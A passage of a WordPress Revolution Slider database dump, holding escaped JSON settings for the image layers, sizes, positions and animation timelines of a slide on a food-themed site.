Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(5,3,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/pozadina-1.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"01\"},{\"v\":\"02\"}]},\"timeline\":{\"delay\":\"3020\",\"transition\":[\"slideoverright\"],\"slots\":[\"default\"],\"duration\":[\"80\"]}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Ananas\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic5.png\",\"imageId\":2516},\"size\":{\"width\":{\"d\":{\"v\":\"397px\",\"e\":true},\"n\":{\"v\":\"368px\",\"e\":true},\"t\":{\"v\":\"363px\",\"e\":true},\"m\":{\"v\":\"196px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"400px\",\"e\":true},\"n\":{\"v\":\"371px\",\"e\":true},\"t\":{\"v\":\"367px\",\"e\":true},\"m\":{\"v\":\"198px\",\"e\":true}},\"originalWidth\":452,\"originalHeight\":351,\"aspectRatio\":{\"d\":{\"v\":1.287749287749287763205074952566064894199371337890625},\"n\":{\"v\":1.287749287749287763205074952566064894199371337890625},\"t\":{\"v\":1.287749287749287763205074952566064894199371337890625},\"m\":{\"v\":1.287749287749287763205074952566064894199371337890625}}},\"position\":{\"x\":{\"d\":{\"v\":\"-4px\",\"e\":true},\"n\":{\"v\":\"-4px\",\"e\":true},\"t\":{\"v\":\"1px\",\"e\":true},\"m\":{\"v\":\"1px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"38px\",\"e\":true},\"n\":{\"v\":\"38px\",\"e\":true},\"t\":{\"v\":\"-55px\",\"e\":true},\"m\":{\"v\":\"-12px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1600,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"speed\":1600,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":1410,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"2\":{\"text\":\"Image 2\",\"alias\":\"Coffe\",\"uid\":2,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic3.png\",\"imageId\":1075},\"size\":{\"width\":{\"d\":{\"v\":\"131px\",\"e\":true},\"n\":{\"v\":\"131px\",\"e\":true},\"t\":{\"v\":\"131px\",\"e\":true},\"m\":{\"v\":\"89px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"138px\",\"e\":true},\"n\":{\"v\":\"138px\",\"e\":true},\"t\":{\"v\":\"138px\",\"e\":true},\"m\":{\"v\":\"94px\",\"e\":true}},\"originalWidth\":131,\"originalHeight\":138,\"aspectRatio\":{\"d\":{\"v\":0.9492753623188405764921071749995462596416473388671875},\"n\":{\"v\":0.9492753623188405764921071749995462596416473388671875},\"t\":{\"v\":0.9492753623188405764921071749995462596416473388671875},\"m\":{\"v\":0.9492753623188405764921071749995462596416473388671875}}},\"position\":{\"x\":{\"d\":{\"v\":\"233px\",\"e\":true},\"n\":{\"v\":\"140px\",\"e\":true},\"t\":{\"v\":\"50px\",\"e\":true},\"m\":{\"v\":\"48px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"225px\",\"e\":true},\"n\":{\"v\":\"110px\",\"e\":true},\"t\":{\"v\":\"150px\",\"e\":true},\"m\":{\"v\":\"184px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":340},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1200,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1200,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":1480,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"5\":{\"text\":\"Image 5\",\"alias\":\"Kokos\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic7.png\",\"imageId\":2536},\"size\":{\"width\":{\"d\":{\"v\":\"198px\",\"e\":true},\"n\":{\"v\":\"159px\",\"e\":true},\"t\":{\"v\":\"163px\",\"e\":true},\"m\":{\"v\":\"111px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"262px\",\"e\":true},\"n\":{\"v\":\"211px\",\"e\":true},\"t\":{\"v\":\"222px\",\"e\":true},\"m\":{\"v\":\"152px\",\"e\":true}},\"originalWidth\":209,\"originalHeight\":276,\"aspectRatio\":{\"d\":{\"v\":0.757246376811594235078928250004537403583526611328125},\"n\":{\"v\":0.757246376811594235078928250004537403583526611328125},\"t\":{\"v\":0.757246376811594235078928250004537403583526611328125},\"m\":{\"v\":0.757246376811594235078928250004537403583526611328125}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"v\":\"-87px\",\"e\":true},\"t\":{\"v\":\"-7px\",\"e\":true},\"m\":{\"v\":\"2px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"v\":\"70px\",\"e\":true},\"t\":{\"v\":\"14px\",\"e\":true},\"m\":{\"v\":\"-59px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":8,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":340},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":2000,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":2000,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":680,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"7\":{\"text\":\"Image 6\",\"alias\":\"Kupus\",\"uid\":7,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic11.png\",\"imageId\":2524},\"size\":{\"width\":{\"d\":{\"v\":\"878px\",\"e\":true},\"n\":{\"v\":\"591px\",\"e\":true},\"t\":{\"v\":\"464\",\"e\":true},\"m\":{\"v\":\"200px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"741px\",\"e\":true},\"n\":{\"v\":\"499px\",\"e\":true},\"t\":{\"v\":\"400px\",\"e\":true},\"m\":{\"v\":\"172\",\"e\":true}},\"originalWidth\":814,\"originalHeight\":702,\"aspectRatio\":{\"d\":{\"v\":1.1595441595441595694637726410292088985443115234375},\"n\":{\"v\":1.1595441595441595694637726410292088985443115234375},\"t\":{\"v\":1.1595441595441595694637726410292088985443115234375},\"m\":{\"v\":1.1595441595441595694637726410292088985443115234375}}},\"position\":{\"x\":{\"d\":{\"v\":\"12px\",\"e\":true},\"n\":{\"v\":\"12px\",\"e\":true},\"t\":{\"v\":\"-5px\",\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-19px\",\"e\":true},\"n\":{\"v\":\"-19px\",\"e\":true},\"t\":{\"v\":\"-10px\",\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":9,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":380},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"{-250,250}\"},\"n\":{\"v\":\"{-250,250}\"},\"t\":{\"v\":\"{-250,250}\"},\"m\":{\"v\":\"{-250,250}\"}},\"y\":{\"d\":{\"v\":\"{-150,150}\"},\"n\":{\"v\":\"{-150,150}\"},\"t\":{\"v\":\"{-150,150}\"},\"m\":{\"v\":\"{-150,150}\"}},\"z\":0,\"scaleX\":\"{0,1}\",\"scaleY\":\"{0,1}\",\"opacity\":\"0\",\"rotationX\":\"{-90,90}\",\"rotationY\":\"{-90,90}\",\"rotationZ\":\"{-360,360}\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1840,\"start\":380,\"startRelative\":380},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1840,\"start\":380,\"startRelative\":380},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":800,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"